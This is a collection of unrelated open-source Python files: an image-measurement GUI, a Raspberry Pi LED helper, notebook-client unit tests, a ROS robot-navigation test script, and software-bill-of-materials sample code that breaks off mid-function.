self._plt.invertY(True) # Vertical axis counts top to bottom
self._plt.hideAxis('left')
self._plt.hideAxis('bottom')
layout.addWidget(self._plt, 0, 0, 5, 1)
self.lut.setImageItem(self.img)
# Settings (with title)
label = QtGui.QLabel('<span style="font-weight:bold">Keymap:</span><br><span style="text-decoration:underline">Shift-click</span>: Add new point<br><span style="text-decoration:underline">Z</span>: Remove last point<br><span style="text-decoration:underline">Left/right arrow</span>: Change frame<br><br><span style="font-weight:bold">Image post-processing:</span>')
layout.addWidget(label, 0, 1)
monoRadio = QtGui.QRadioButton('mono')
rgbaRadio = QtGui.QRadioButton('rgba')
grayBox = QtGui.QCheckBox('grayscale')
layout.addWidget(monoRadio, 2, 1)
layout.addWidget(rgbaRadio, 3, 1)
layout.addWidget(grayBox, 4, 1)
monoRadio.setChecked(True)
# Grayscale click action
def setGrayscale(state):
if state == QtCore.Qt.Checked:
                # Convert the RGB image to grayscale using the ITU-R BT.601 luma weights
self.img.setImage(np.dot(self.image[...,:3], [0.299, 0.587, 0.114]))
monoRadio.setChecked(True)
rgbaRadio.setChecked(False)
rgbaRadio.setEnabled(False)
self._grayscale_active = True
else:
self.img.setImage(self.image)
rgbaRadio.setEnabled(True)
self._grayscale_active = False
# Connect state change events to their functions
grayBox.stateChanged.connect(setGrayscale)
monoRadio.toggled.connect(lambda _: self.lut.setLevelMode('mono' if monoRadio.isChecked() else 'rgba'))
        # Disable the grayscale and rgba buttons if the image does not have rgb data
if len(self.image.shape) < 3:
grayBox.setEnabled(False)
rgbaRadio.setEnabled(False)
# Origin lines
self._origin_vline = pg.InfiniteLine(angle=90, pos=window.origin[0], pen=self.color, movable=False)
self._origin_hline = pg.InfiniteLine(angle=0, pos=window.origin[1], pen=self.color, movable=False)
self._plt.addItem(self._origin_vline, ignoreBounds=True)
self._plt.addItem(self._origin_hline, ignoreBounds=True)
# Connect the signal proxies and events
self._mouse_move_proxy = pg.SignalProxy(self._plt.scene().sigMouseMoved, rateLimit=60, slot=self._mouse_move_handler)
self._mouse_click_proxy = pg.SignalProxy(self._plt.scene().sigMouseClicked, rateLimit=60, slot=self._mouse_click_handler)
window.key_press_event.connect(self._key_press_handler)
window.key_release_event.connect(self._key_release_handler)
# Event handlers
def _key_press_handler(self, key):
if key == QtCore.Qt.Key_Shift: self._shift_active = True
elif key == QtCore.Qt.Key_Z: self.point_remove_last_event.emit()
def _key_release_handler(self, key):
if key == QtCore.Qt.Key_Shift: self._shift_active = False
def _mouse_move_handler(self, event):
pos = event[0] # Using signal proxy turns original arguments into a tuple
if self._plt.sceneBoundingRect().contains(pos):
mouse_position = self._plt.plotItem.vb.mapSceneToView(pos)
self.mouse_move_event.emit((mouse_position.x(), mouse_position.y()))
if self.origin_move_active:
self._origin_hline.setPos(mouse_position.y())
self._origin_vline.setPos(mouse_position.x())
self.origin_change_event.emit((mouse_position.x(), mouse_position.y()))
def _mouse_click_handler(self, event):
if event[0] == None: return # Prevent attribute error
pos = event[0].pos() # Using signal proxy turns original arguments into a tuple
if self.origin_move_active:
self.origin_move_active = False
return
if self._shift_active: self.point_add_event.emit((pos.x(), pos.y()))
def update_points(self, points):
"""Update the scatter plot with the points"""
self.scatter.setData(pos=points)
# Plot widget functions
def set_origin(self, position):
"""Change the origin's position to a new location"""
self.origin = position
        self._origin_hline.setPos(position[1])
        self._origin_vline.setPos(position[0])
def set_image(self, image):
"""Change the current image that is shown"""
self.image = np.flipud(np.rot90(image))
# Set image on the view and copy over the levels (LUT)
levels = self.lut.getLevels()
self.img.setImage(self.image if not self._grayscale_active else np.dot(self.image[...,:3], [0.299, 0.587, 0.114]))
if self.lut.levelMode == 'mono': self.lut.setLevels(min=levels[0], max=levels[1])
else: self.lut.setLevels(rgba=levels)
        self.lut.regionChanged() # Tell PyQtGraph the LUT regions have changed to update the image view
class CalibrationDialog(QtWidgets.QDialog):
"""Qt dialog class for the calibration popup"""
def __init__(self):
super().__init__()
# Create the window and add all form elements
self.setWindowTitle('ImageP Calibration')
buttons = QtWidgets.QDialogButtonBox.Ok | QtWidgets.QDialogButtonBox.Cancel
self.buttonBox = QtWidgets.QDialogButtonBox(buttons)
self.buttonBox.accepted.connect(self._onaccept)
self.buttonBox.rejected.connect(self.reject)
self.layout = QtWidgets.QFormLayout()
self.layout.addRow(QtWidgets.QLabel('Enter the size of each pixel and provide a unit'))
self.xedit = QtWidgets.QLineEdit()
self.xedit.setValidator(QtGui.QDoubleValidator())
self.layout.addRow('X-direction pixel size', self.xedit)
self.yedit = QtWidgets.QLineEdit()
self.yedit.setValidator(QtGui.QDoubleValidator())
self.layout.addRow('Y-direction pixel size', self.yedit)
self.unitedit = QtWidgets.QLineEdit()
self.layout.addRow('Unit', self.unitedit)
self.layout.addRow(self.buttonBox)
self.setLayout(self.layout)
def get_xy_calibration(self):
"""Convert the entered calibration values to floats and return them as a tuple"""
return (float(self.xedit.text()), float(self.yedit.text()))
def get_unit(self):
"""Get the entered unit"""
return self.unitedit.text()
def _onaccept(self):
"""
This internal function adds a bit of functionality to the self.accept function, it
checks whether the entered values are numbers. If not, an error dialog will show.
"""
try:
self.get_xy_calibration()
self.accept()
except Exception as e:
msg = QtWidgets.QMessageBox()
msg.setIcon(QtWidgets.QMessageBox.Critical)
msg.setText('An error occurred!')
msg.setInformativeText('Numbers entered were invalid.')
msg.setWindowTitle('ImageP Error')
msg.exec_()
class ImageWindow(QtWidgets.QMainWindow):
key_press_event = QtCore.pyqtSignal(int)
key_release_event = QtCore.pyqtSignal(int)
"""Class for the image window of ImageP"""
def __init__(self, image, origin, calibration, unit, color):
super(ImageWindow, self).__init__()
self.image = image
self.origin = origin
self.calibration = calibration
self.unit = unit # Default unit is pixels
self.color = color
self.points = []
def closeEvent(self, event):
# Needed to properly quit when running in IPython console / Spyder IDE
QtWidgets.QApplication.quit()
def keyPressEvent(self, event):
"""Event for key press"""
self.key_press_event.emit(event.key())
def keyReleaseEvent(self, event):
"""Event for key release"""
self.key_release_event.emit(event.key())
def init_gui(self):
"""Internal function that creates the GUI"""
self.setGeometry(100, 100, 900, 650)
self.setWindowTitle('ImageP ' + VERSION_INFO)
self._main = QtWidgets.QWidget()
self.setCentralWidget(self._main)
# Put plot in main layout
layout = QtWidgets.QVBoxLayout(self._main)
self.plotwidget = PlotWidget(self)
self.plotwidget.point_remove_last_event.connect(self.point_remove_last_listener)
self.plotwidget.point_add_event.connect(self.point_add_listener)
self.plotwidget.mouse_move_event.connect(self._update_statusbar_handler)
self.plotwidget.origin_change_event.connect(self._origin_change_listener)
layout.addWidget(self.plotwidget)
# Add menu items
def _add_action(menu, text, function):
"""Small internal function to add an action to a menu with a certain trigger function"""
# Solely made to clean up the codebase
action = QtWidgets.QAction(text, self)
menu.addAction(action)
action.triggered.connect(function)
actions = self.menuBar().addMenu('&Actions')
_add_action(actions, '&Calibrate', self._show_calibration_dialog)
_add_action(actions, '&Move origin', self._enable_moving_origin)
help = self.menuBar().addMenu('&Help')
_add_action(help, '&Documentation', self._show_documentation_popup)
_add_action(help, '&About and credits', self._show_about_popup)
# Add status bar items
self.statusbar = QtWidgets.QStatusBar()
self.setStatusBar(self.statusbar)
self.mouse_position_label = QtWidgets.QLabel(f'Position: -')
self.statusbar.addWidget(self.mouse_position_label)
self.dist_label = QtWidgets.QLabel('Distance: -')
self.statusbar.addWidget(self.dist_label)
self.angle_label = QtWidgets.QLabel('Angle: -')
self.statusbar.addWidget(self.angle_label)
def point_remove_last_listener(self):
"""Remove that last clicked point (operated with z-key)"""
if len(self.points) > 0:
self.points = self.points[:-1]
self.plotwidget.update_points(self.points)
def point_add_listener(self, point):
"""When a point is clicked, add it to the list and update the scatter plot"""
self.points.append(point)
self.plotwidget.update_points(self.points)
def get_relative_calibrated(self, point):
"""Get point position relative to origin and apply calibration"""
# First position the points relative to the origin, then multiply by their calibration factors
return ((point[0]-self.origin[0])*self.calibration[0], ((self.origin[1]-point[1])*self.calibration[1]))
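        # Editor's example (illustrative numbers): with origin=(100, 400) and
        # calibration=(0.5, 0.5), a clicked point (120, 380) maps to
        # ((120-100)*0.5, (400-380)*0.5) = (10.0, 10.0) in calibrated units.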
def get_calibrated_points(self):
"""Returns the array we were after, the calibrated points from the image relative to the origin"""
# Convert to NumPy array for easier matrix manipulation
return np.array([self.get_relative_calibrated(point) for point in self.points])
def _show_documentation_popup(self):
"""Internal function to show the documentation popup window"""
msg = QtWidgets.QMessageBox()
msg.setIcon(QtWidgets.QMessageBox.Information)
msg.setText(DOCUMENTATION)
msg.setWindowTitle("ImageP Documentation")
msg.setStandardButtons(QtWidgets.QMessageBox.Ok)
msg.exec_()
def _show_about_popup(self):
"""Internal function to show the about and credits popup window"""
msg = QtWidgets.QMessageBox()
msg.setIcon(QtWidgets.QMessageBox.Information)
msg.setText('ImageP is a minimalistic Python version of <a href="https://imagej.nih.gov/ij/">ImageJ</a> written by and for Applied Physics students at the University of Twente. It is licensed under the MIT license.<br><br>ImageP uses <a href="https://www.riverbankcomputing.com/software/pyqt/">PyQt</a> for the GUI and <a href="https://opencv.org//">OpenCV</a> together with <a href="https://numpy.org/">NumPy</a> for file loading. <a href="https://www.pyqtgraph.org/">PyQtGraph</a> is used to display the data.<br><br>View <a href="https://github.com/JitseB/ImageP">GitHub repository</a> for updates.')
msg.setInformativeText(CHANGELOG)
msg.setWindowTitle('ImageP About and credits')
msg.setStandardButtons(QtWidgets.QMessageBox.Ok)
msg.exec_()
def _show_calibration_dialog(self):
"""Internal function to show the calibration dialog"""
dialog = CalibrationDialog()
if not dialog.exec(): return # Dialog was cancelled or closed
# Set internal variables
self.calibration = dialog.get_xy_calibration()
self.unit = dialog.get_unit()
def _enable_moving_origin(self):
"""Internal function to enable movement of the origin"""
self.plotwidget.origin_move_active = True
def _origin_change_listener(self, origin):
self.origin = origin
def _update_statusbar_handler(self, mouse_position):
"""Internal function to update the statusbar labels"""
# All points (A, B and C) are measured from the origin position
# Using cosine rule to solve angle (finding angle(CAB), so between the lines AC and AB)
C = self.get_relative_calibrated(mouse_position)
self.mouse_position_label.setText(f'Position: x={C[0]:.2f} {self.unit}; y={C[1]:.2f} {self.unit}')
if len(self.points) >= 1:
B = self.get_relative_calibrated(self.points[-1])
distanceBC = ((B[0]-C[0])**2+(B[1]-C[1])**2)**(1/2)
self.dist_label.setText(f'Distance: {distanceBC:.2f} {self.unit}')
if len(self.points) >= 2:
A = self.get_relative_calibrated(self.points[-2])
distanceAC = ((A[0]-C[0])**2+(A[1]-C[1])**2)**(1/2)
distanceAB = ((A[0]-B[0])**2+(A[1]-B[1])**2)**(1/2)
try:
argument = (distanceAC**2+distanceAB**2-distanceBC**2)/(2*distanceAC*distanceAB)
if not -1 <= argument <= 1: return # arccos only takes values between -1 and 1
angle = np.arccos(argument)*180/np.pi
self.angle_label.setText(f'Angle: {angle:.2f} deg')
except ZeroDivisionError as e: pass
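    # Editor's note: the angle reported above follows the law of cosines,
    #   cos(angle at A) = (|AC|^2 + |AB|^2 - |BC|^2) / (2*|AC|*|AB|),
    # where A and B are the last two clicked points and C is the cursor position,
    # all measured relative to the origin.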
class VideoWindow(ImageWindow):
"""Class for the video window of ImageP"""
def __init__(self, capture, origin, calibration, unit, color, frame, auto_progress, auto_progress_frame_interval):
self.capture = capture
self.frame = frame
self.auto_progress = auto_progress
self.auto_progress_frame_interval = auto_progress_frame_interval
self.max_frame = int(capture.get(cv2.CAP_PROP_FRAME_COUNT))-1
self.capture.set(1, frame) # Set the frame number within the VideoCapture object
success, image = self.capture.read()
if not success: raise Exception('Could not read video capture')
        # Convert image data from BGR to RGB for display
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
# The origin point was returned calibrated from the (0, 0) origin, we have to compensate for that...
if origin is not None: origin = (origin[0], image.shape[0]-origin[1])
else: origin = (0, image.shape[0])
super(VideoWindow, self).__init__(image, origin, calibration, unit, color)
def init_video_gui(self):
"""Initialize the video GUI"""
# First initialize the image GUI, then add to that:
self.init_gui()
# Connect to the necessary events
self.key_press_event.connect(self._key_press_listener)
self.plotwidget.point_add_event.connect(self._auto_progress_handler)
self.plotwidget.point_remove_last_event.connect(self._point_remove_last_listener)
# Add an extra label for the frame number to the status bar
self.frame_label = QtWidgets.QLabel(f'Frame: {self.frame}/{self.max_frame}')
self.statusbar.addWidget(self.frame_label)
def _key_press_listener(self, key):
"""Listener for key press event so that the user can move through the frames"""
if key == QtCore.Qt.Key_Right and self.frame < self.max_frame: self._change_frame(self.frame+1)
elif key == QtCore.Qt.Key_Left and self.frame > 0: self._change_frame(self.frame-1)
def _point_remove_last_listener(self):
"""Additional listener (see image class) so that when auto progressing, using the z-key, it goes back in time"""
# Roll back the frames when auto-progressing is enabled
if self.auto_progress and len(self.points) > 0: self._change_frame(self.frame - self.auto_progress_frame_interval)
def _change_frame(self, frame):
"""Internal function to change the frame currently visible"""
self.capture.set(1, frame) # Set the frame number within the VideoCapture object
success, image = self.capture.read()
if not success: return False
# Convert image data to RGB
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
self.plotwidget.set_image(image)
# Set frame label to correct frame number
self.frame_label.setText(f'Frame: {frame}/{self.max_frame}')
self.frame = frame
return True
def _auto_progress_handler(self, _):
"""Internal function as listener for the button click event from PyQtGraph, only triggers when a point is placed"""
# If 'auto_progress' is true, move to next frame
if self.auto_progress and not self._change_frame(self.frame + self.auto_progress_frame_interval):
msg = QtWidgets.QMessageBox()
msg.setIcon(QtWidgets.QMessageBox.Critical)
msg.setText('Cannot move any further!')
msg.setInformativeText('You ran out of frames to click.')
msg.setWindowTitle('ImageP Error')
msg.exec_()
def gui(path, origin=None, calibration=(1, 1), unit='px', color='w', frame=0, auto_progress=False, auto_progress_frame_interval=10):
"""
Function that opens the GUI of ImageP. Returns array with calibrated clicked points relative to the origin.
Parameters:
- 'path': Path to image or video.
- 'origin': Change the origin to position xy (optional) (always in pixels!).
- 'calibration': The pixel calibration array (x and y pixel size) (optional).
- 'unit': The unit caused by the calibration array (pixels [px] by default).
If an array with the calibration values for the pixels was passed, it is recommended to also pass the corresponding unit to prevent confusion later on.
- 'color': The color used for the axis and points (optional) (white by default).
VIDEO ONLY:
- 'frame': The frame to start the program from (0 by default).
- 'auto_progress': Automatically progress to the next frame after clicking (false by default).
- 'auto_progress_frame_interval': Frames that are skipped when auto-progressing (10 frames per click by default).
'origin', 'calibration' and 'unit' can also be defined from within the GUI.
"""
try:
# Load the image
image = cv2.imread(path)
if image is None: raise Exception
        # Convert image data from BGR to RGB for display
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
# The origin point was returned calibrated from the (0, 0) origin, we have to compensate for that...
# 16 May 2021: Removed unit origin as we cannot know the previous origin, therefore we cannot
# compensate for it properly.
if origin is not None: origin = (origin[0], image.shape[0]-origin[1])
else: origin = (0, image.shape[0])
# Launch the GUI application
# Use previous instance if available
if not QtWidgets.QApplication.instance(): app = QtWidgets.QApplication(sys.argv)
else: app = QtWidgets.QApplication.instance()
window = ImageWindow(image, origin, calibration, unit, color)
window.init_gui()
window.show()
app.exec_()
# Return the calibrated points
return window.get_calibrated_points()
except Exception as e:
# If it is not an image, try to load the video
capture = cv2.VideoCapture(path)
if not capture.isOpened(): raise FileNotFoundError('The specified file could not be found (or loaded)')
# Launch the GUI application
# Use previous instance if available
if not QtWidgets.QApplication.instance(): app = QtWidgets.QApplication(sys.argv)
else: app = QtWidgets.QApplication.instance()
window = VideoWindow(capture, origin, calibration, unit, color, frame, auto_progress, auto_progress_frame_interval)
window.init_video_gui()
window.show()
app.exec_()
# Return the calibrated points
return window.get_calibrated_points()
# Test the application with a test image
if __name__ == '__main__':
points = gui('./test.avi', color='w', frame=2000, auto_progress=True, auto_progress_frame_interval=10)
print(points)
``` |
{
"source": "JitseB/SpacePointer",
"score": 3
} |
#### File: SpacePointer/updater/led.py
```python
import RPi.GPIO as GPIO
import time
GPIO.setmode(GPIO.BOARD)
GPIO.setwarnings(False)
class LED():
def __init__(self, pin):
self.state = 0
self.pin = pin
GPIO.setup(self.pin, GPIO.OUT)
GPIO.output(self.pin, self.state)
def set(self, onoff):
self.state = onoff
        GPIO.output(self.pin, self.state)
    def __del__(self):
        # Release the GPIO pins when the object is garbage-collected
        GPIO.cleanup()
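# Editor's usage sketch (pin 7 is an illustrative BOARD-numbered pin):
# led = LED(7)
# led.set(GPIO.HIGH)
# time.sleep(1)
# led.set(GPIO.LOW)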
``` |
{
"source": "jitseniesen/spyder-notebook",
"score": 2
} |
#### File: widgets/tests/test_client.py
```python
import pytest
from qtpy.QtWidgets import QWidget
import requests
# Local imports
from spyder_notebook.widgets.client import NotebookClient
class MockPlugin(QWidget):
def get_plugin_actions(self):
return []
@pytest.fixture
def plugin(qtbot):
"""
Construct mock plugin with NotebookClient for use in tests.
Use `plugin.client` to access the client.
"""
plugin = MockPlugin()
qtbot.addWidget(plugin)
client = NotebookClient(plugin, '/path/notebooks/ham.ipynb')
plugin.client = client
server_info = {'notebook_dir': '/path/notebooks',
'url': 'fake_url',
'token': '<PASSWORD>'}
client.register(server_info)
return plugin
def test_notebookclient_get_kernel_id(plugin, mocker):
"""Basic unit test for NotebookClient.get_kernel_id()."""
response = mocker.Mock()
content = b'[{"kernel": {"id": "42"}, "notebook": {"path": "ham.ipynb"}}]'
response.content = content
response.status_code = requests.codes.ok
mocker.patch('requests.get', return_value=response)
kernel_id = plugin.client.get_kernel_id()
assert kernel_id == '42'
def test_notebookclient_get_kernel_id_with_fields_missing(plugin, mocker):
"""Test NotebookClient.get_kernel_id() if response has fields missing."""
response = mocker.Mock()
content = (b'[{"kernel": {"id": "1"}, "notebook": {"spam": "eggs"}},'
b' {"kernel": {"id": "2"}},'
b' {"kernel": {"id": "3"}, "notebook": {"path": "ham.ipynb"}}]')
response.content = content
response.status_code = requests.codes.ok
mocker.patch('requests.get', return_value=response)
kernel_id = plugin.client.get_kernel_id()
assert kernel_id == '3'
def test_notebookclient_get_kernel_id_with_error_status(plugin, mocker):
"""Test NotebookClient.get_kernel_id() when response has error status."""
response = mocker.Mock()
content = b'{"message": "error"}'
response.content = content
response.status_code = requests.codes.forbidden
mocker.patch('requests.get', return_value=response)
MockMessageBox = mocker.patch('spyder_notebook.widgets.client.QMessageBox')
plugin.client.get_kernel_id()
MockMessageBox.warning.assert_called()
def test_notebookclient_get_kernel_id_with_exception(plugin, mocker):
"""Test NotebookClient.get_kernel_id() when request raises an exception."""
exception = requests.exceptions.ProxyError('kaboom')
mocker.patch('requests.get', side_effect=exception)
MockMessageBox = mocker.patch('spyder_notebook.widgets.client.QMessageBox')
plugin.client.get_kernel_id()
MockMessageBox.warning.assert_called()
``` |
{
"source": "JitskedeVries/amr-lmpcc",
"score": 2
} |
#### File: lmpcc/scripts/cadrl_client.py
```python
import rospy
import sys
# Brings in the SimpleActionClient
import actionlib
import math
import tf2_ros
from geometry_msgs.msg import *
from std_srvs.srv import *
import time
"""Reference Path"""
#x = [1.5, 3.5, 5.5, 7, 5.5, 3.5, 1.5, 0, 1.5]
#y = [0.5, 0.5, 0.5, 2, 3.5, 3.5, 3.5, 2, 0.5]
#theta = [0, 0, 0, 1.57, 3.14, 3.14, 3.14, -1.57, 0]
#global_path:
#x = [1.5, 3.5, 5.5, 7, 8, 10, 13, 11, 10.5, 9, 7, 5.5, 3.5, 1.5, 0, 1.5]
#y = [0.5, 0.5, 0.5, 2, 4, 4, 6, 7.5, 6, 4, 3.5, 3.5, 3.5, 3.5, 2, 0.5]
#theta = [0, 0, 0, 1.57, 0, 0, 1.57, 3.14, -1.57, 3.14, 3.14, 3.14, 3.14, 3.14, -1.57, 0]
# faculty corridor
#global_path:
#x= [50, 55, 60, 65,70,80]
#y= [-0.5, -0.5, -0.5, -0.5,-0.5,-0.5]
#theta= [0,0,0,0,0,0]
#reference_velocity= 0.5
#cadrl test
x= [15]
y= [0]
theta= [0]
reference_velocity= 0.5
distance_threshold = 0.63
loop = True
def cadrl_client(index,pub_global_goal):
# Creates a goal to send to the action server.
goal = PoseStamped()
goal.header.stamp = rospy.get_rostime()
goal.header.frame_id = "odom"
goal.pose.position.x = x[index]
goal.pose.position.y = y[index]
goal.pose.orientation.x = 0
goal.pose.orientation.y = 0
    goal.pose.orientation.z = math.sin(theta[index]*0.5)
    goal.pose.orientation.w = math.cos(theta[index]*0.5)
# Sends the goal to the action server.
pub_global_goal.publish(goal)
def check_if_arrived(i,tfBuffer):
try:
trans = tfBuffer.lookup_transform('odom', 'base_link', rospy.Time(0))
except (tf2_ros.LookupException, tf2_ros.ConnectivityException, tf2_ros.ExtrapolationException):
print ("Could not get TF")
return False
if math.sqrt(pow(x[i]-trans.transform.translation.x,2)+pow(y[i]-trans.transform.translation.y,2)) < 1:
return True
else:
return False
def collision_check(tfBuffer):
try:
pos_ped_1 = tfBuffer.lookup_transform('base_link', 'ped_link_1', rospy.Time(0))
except (tf2_ros.LookupException, tf2_ros.ConnectivityException, tf2_ros.ExtrapolationException):
print ("Could not get ped_link_1" )
return False
try:
pos_ped_2 = tfBuffer.lookup_transform('base_link', 'ped_link_2', rospy.Time(0))
except (tf2_ros.LookupException, tf2_ros.ConnectivityException, tf2_ros.ExtrapolationException):
print ("Could not get ped_link_2" )
return False
try:
pos_ped_3 = tfBuffer.lookup_transform('base_link', 'ped_link_3', rospy.Time(0))
except (tf2_ros.LookupException, tf2_ros.ConnectivityException, tf2_ros.ExtrapolationException):
print ("Could not get ped_link_3" )
return False
try:
pos_ped_4 = tfBuffer.lookup_transform('base_link', 'ped_link_4', rospy.Time(0))
except (tf2_ros.LookupException, tf2_ros.ConnectivityException, tf2_ros.ExtrapolationException):
print ("Could not get ped_link_4" )
return False
"""
try:
pos_ped_5 = tfBuffer.lookup_transform('base_link', 'ped_link_5', rospy.Time(0))
except (tf2_ros.LookupException, tf2_ros.ConnectivityException, tf2_ros.ExtrapolationException):
print ("Could not get ped_link_5" )
return False
try:
pos_ped_6 = tfBuffer.lookup_transform('base_link', 'ped_link_6', rospy.Time(0))
except (tf2_ros.LookupException, tf2_ros.ConnectivityException, tf2_ros.ExtrapolationException):
print ("Could not get ped_link_6" )
return False
"""
ped_distance_1 =math.sqrt(pow(pos_ped_1.transform.translation.x,2)+pow(pos_ped_1.transform.translation.y,2))
#print("ped_distance_1: " +str(ped_distance_1))
if ped_distance_1 < distance_threshold:
print ("Collision with ped_link_1!!!")
return True
#print("ped_distance_1: " +str(ped_distance_1))
if math.sqrt(pow(pos_ped_2.transform.translation.x,2)+pow(pos_ped_2.transform.translation.y,2)) < distance_threshold:
print ("Collision with ped_link_2")
return True
if math.sqrt(pow(pos_ped_3.transform.translation.x,2)+pow(pos_ped_3.transform.translation.y,2)) < distance_threshold:
print ("Collision with ped_link_3")
return True
if math.sqrt(pow(pos_ped_4.transform.translation.x,2)+pow(pos_ped_4.transform.translation.y,2)) < distance_threshold:
print ("Collision with ped_link_4")
return True
else:
return False
"""
if math.sqrt(pow(pos_ped_5.transform.translation.x,2)+pow(pos_ped_5.transform.translation.y,2)) < distance_threshold:
print ("Collision with ped_link_5")
return True
if math.sqrt(pow(pos_ped_6.transform.translation.x,2)+pow(pos_ped_6.transform.translation.y,2)) < distance_threshold:
print ("Collision with ped_link_6")
return True
"""
if __name__ == '__main__':
rospy.init_node('cadrl_base_client_py')
i = 0
pub_global_goal = rospy.Publisher('/nn_jackal/goal',PoseStamped, queue_size=1)
reset_simulation_client_ = rospy.ServiceProxy("/gazebo/reset_world",Empty());
"""ROS Variables"""
tfBuffer = tf2_ros.Buffer()
listener = tf2_ros.TransformListener(tfBuffer)
collision_number = 0
n_events = 0
trials = 0
timeout = 0
mean_time=0
while(i < len(x)):
if trials > 100:
break
try:
# Initializes a rospy node so that the SimpleActionClient can
# publish and subscribe over ROS.
cadrl_client(i,pub_global_goal)
arrived = False
col = False
ti = time.time() # initial time
while (not arrived) and (not col):
#rospy.sleep(0.1)
cadrl_client(i,pub_global_goal)
arrived = check_if_arrived(i,tfBuffer)
if arrived:
break
col = collision_check(tfBuffer)
if col:
collision_number += 1
trials +=1
i=0
reset_simulation_client_()
rospy.sleep(1)
break
tf = time.time()
if tf-ti > 90:
reset_simulation_client_()
i=0
timeout += 1
trials +=1
break
#print("Not arrived in: " + str(tf-ti) + " [s]")
except rospy.ROSInterruptException:
print("Failed")
break
print("next goal pos..."+str(i+1))
i += 1
if i == len(x):
i = 0
n_events += 1
trials +=1
mean_time +=tf-ti
print("Mean time to goal: " + str(mean_time))
print("Number of collisions: " + str(collision_number))
print("Number of successful events: " + str(n_events))
print("Number of trials: " + str(trials))
print("Number of timeout: " + str(timeout))
reset_simulation_client_()
rospy.sleep(1)
if trials > 100:
break
``` |
{
"source": "jitsuin-inc/archivist-samples",
"score": 2
} |
#### File: archivist_samples/software_bill_of_materials/main.py
```python
import logging
from sys import exit as sys_exit
from sys import stdout as sys_stdout
from archivist.parser import common_parser
from ..testing.parser import common_endpoint
from .run import run
LOGGER = logging.getLogger(__name__)
def main():
parser, _ = common_parser(
"Simple SBOM implementation that conforms with NTIA recommendations"
)
parser.add_argument(
"--namespace",
type=str,
dest="namespace",
action="store",
default=None,
help="namespace of item population (to enable parallel demos",
)
args = parser.parse_args()
poc = common_endpoint("sbom", args)
run(poc)
parser.print_help(sys_stdout)
sys_exit(1)
```
#### File: archivist_samples/software_bill_of_materials/software_deployment.py
```python
from typing import Optional
# pylint:disable=unused-import # To prevent cyclical import errors forward referencing is used
# pylint:disable=cyclic-import # but pylint doesn't understand this feature
from archivist import archivist as type_helper
class SoftwareDeployment:
def __init__(
self,
arch: "type_helper.Archivist",
):
self._arch = arch
self._asset = None
self._attachments = None
self._environment = None
@property
def arch(self):
return self._arch
@property
def asset(self):
return self._asset
@property
def attachments(self):
return self._attachments
@property
def environment(self):
return self._environment
# Create Software Deployment
def create(
self,
sbom_name: str,
sbom_description: str,
*,
sbom_environment: Optional[str],
attachments: Optional[list] = None,
custom_attrs: Optional[dict] = None,
):
if sbom_environment is not None:
self._environment = sbom_environment
else:
sbom_environment = self._environment
self._add_attachments(attachments)
attrs = {
"arc_display_name": sbom_name,
"arc_description": sbom_description,
"arc_display_type": "Software Deployment",
"sbom_environment": sbom_environment,
"arc_attachments": [
{
"arc_display_name": "arc_primary_image",
"arc_attachment_identity": attachment["identity"],
"arc_hash_value": attachment["hash"]["value"],
"arc_hash_alg": attachment["hash"]["alg"],
}
for attachment in self._attachments
],
}
if custom_attrs is not None:
attrs.update(custom_attrs)
self._asset = self.arch.assets.create(attrs=attrs, confirm=True)
return self._asset
# Installation Event
def installation(
self,
sbom_installation: dict,
*,
attachments: Optional[list] = None,
custom_attrs: Optional[dict] = None,
custom_asset_attrs: Optional[dict] = None,
):
if sbom_installation["environment"] is not None:
self._environment = sbom_installation["environment"]
else:
sbom_installation["environment"] = self._environment
self._add_attachments(attachments)
props = {
"operation": "Record",
"behaviour": "RecordEvidence",
}
attrs = {
"arc_description": sbom_installation["description"],
"arc_evidence": "Installation",
"arc_display_type": "Installation",
"sbom_installation_component": sbom_installation["name"],
"sbom_installation_hash": sbom_installation["hash"],
"sbom_installation_version": sbom_installation["version"],
"sbom_installation_author": sbom_installation["author"],
"sbom_installation_supplier": sbom_installation["supplier"],
"sbom_installation_uuid": sbom_installation["uuid"],
"sbom_installation_environment": sbom_installation["environment"],
"arc_attachments": [
{
"arc_display_name": sbom_installation["description"],
"arc_attachment_identity": attachment["identity"],
"arc_hash_value": attachment["hash"]["value"],
"arc_hash_alg": attachment["hash"]["alg"],
}
for attachment in self._attachments
],
}
if custom_attrs is not None:
attrs.update(custom_attrs)
asset_attrs = {
"sbom_component": sbom_installation["name"],
"sbom_hash": sbom_installation["hash"],
"sbom_version": sbom_installation["version"],
"sbom_author": sbom_installation["author"],
"sbom_supplier": sbom_installation["supplier"],
"sbom_uuid": sbom_installation["uuid"],
"sbom_environment": sbom_installation["environment"],
}
if custom_asset_attrs is not None:
asset_attrs.update(custom_asset_attrs)
return self.arch.events.create(
self._asset["identity"],
props=props,
attrs=attrs,
asset_attrs=asset_attrs,
confirm=True,
)
def decommission(
self,
sbom_decomission: dict,
*,
attachments: Optional[list] = None,
custom_attrs: Optional[dict] = None,
custom_asset_attrs: Optional[dict] = None,
):
if sbom_decomission["environment"] is not None:
self._environment = sbom_decomission["environment"]
else:
sbom_decomission["environment"] = self._environment
self._add_attachments(attachments)
props = {
"operation": "Record",
"behaviour": "RecordEvidence",
}
attrs = {
"arc_description": sbom_decomission["description"],
"arc_evidence": "Decomission",
"arc_display_type": "Decomission",
"sbom_decomission_component": sbom_decomission["name"],
"sbom_decomission_version": sbom_decomission["version"],
"sbom_decomission_author": sbom_decomission["author"],
"sbom_decomission_supplier": sbom_decomission["supplier"],
"sbom_decomission_uuid": sbom_decomission["uuid"],
"sbom_decomission_target_date": sbom_decomission["target_date"],
"sbom_decomission_status": sbom_decomission["status"],
"sbom_decomission_environment": sbom_decomission["environment"],
"arc_attachments": [
{
"arc_display_name": sbom_decomission["description"],
"arc_attachment_identity": attachment["identity"],
"arc_hash_value": attachment["hash"]["value"],
"arc_hash_alg": attachment["hash"]["alg"],
}
for attachment in self._attachments
],
}
if custom_attrs is not None:
attrs.update(custom_attrs)
asset_attrs = {
"sbom_decomission_target_date": sbom_decomission["target_date"],
"sbom_decomission_status": sbom_decomission["status"],
"sbom_environment": sbom_decomission["environment"],
}
if custom_asset_attrs is not None:
asset_attrs.update(custom_asset_attrs)
return self.arch.events.create(
self._asset["identity"], props=props, attrs=attrs, asset_attrs=asset_attrs
)
# Upgrade Events
def upgrade(
self,
sbom_upgrade: dict,
*,
attachments: Optional[list] = None,
custom_attrs: Optional[dict] = None,
custom_asset_attrs: Optional[dict] = None,
):
